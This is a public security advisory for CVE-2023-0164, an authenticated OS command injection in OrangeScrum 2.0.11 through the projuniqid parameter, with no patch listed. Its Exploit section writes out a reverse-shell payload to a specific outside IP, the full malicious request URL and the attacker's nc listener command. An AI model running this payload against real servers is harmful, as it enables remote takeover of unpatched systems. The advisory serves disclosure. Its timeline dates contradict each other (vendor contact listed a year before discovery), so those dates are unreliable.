OrangeScrum 2.0.11 - OS Command Injection via projuniqid

Summary

NameOrangeScrum 2.0.11 - OS Command Injection via projuniqid
Code nameQueen
ProductOrangeScrum
Affected versions2.0.11
StatePublic
Release Date2023-01-16

Vulnerability

KindOS Command Injection
Rule404. OS Command Injection
RemoteYes
CVSSv3 VectorCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CVSSv3 Base Score9.9
Exploit availableNo
CVE ID(s)CVE-2023-0164

Description

OrangeScrum version 2.0.11 allows an authenticated external attacker to execute arbitrary commands on the server. This is possible because the application injects an attacker-controlled parameter into a system function.

Vulnerability

This vulnerability occurs because the application injects an attacker-controlled parameter into a system function.

Exploit

To exploit this vulnerability, we just need to send the malicious command we want the server to execute through the projuniqid parameter using the $() syntax.

$(bash -i+>& /dev/tcp/67.205.165.158/3000 0>&1)
https://retr02332bughunter.orangescrum.com/log_times/download_pdf_timelog?projuniqid=$(bash+-i+>%26+/dev/tcp/67.205.165.158/3000+0>%261)&usrid=&date=&strddt=&enddt=&dt_format=d/m/y&checkedFields=date,usr_name,task_no,task_title,hours,description,start,end,break,billable

Thus, we will only have to execute the command nc -lvp 3000 on the attacker's malicious server to receive the reverse shell from the victim server.

Evidence of exploitation

vulnerability-code-orangescrum

vulnerability-orangescrum

exploit-success-orangescrum

Our security policy

We have reserved the ID CVE-2023-0164 to refer to this issue from now on.

System Information

  • Version: OrangeScrum 2.0.11

  • Operating System: GNU/Linux

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

References

Vendor page https://github.com/Orangescrum/orangescrum/

Timeline

Time-lapse-logo

2023-01-10

Vulnerability discovered.

Time-lapse-logo

2022-01-10

Vendor contacted.

Time-lapse-logo

2022-01-10

Vendor replied acknowledging the report.

Time-lapse-logo

2022-01-10

Vendor Confirmed the vulnerability.

Time-lapse-logo

2023-01-16

Public Disclosure.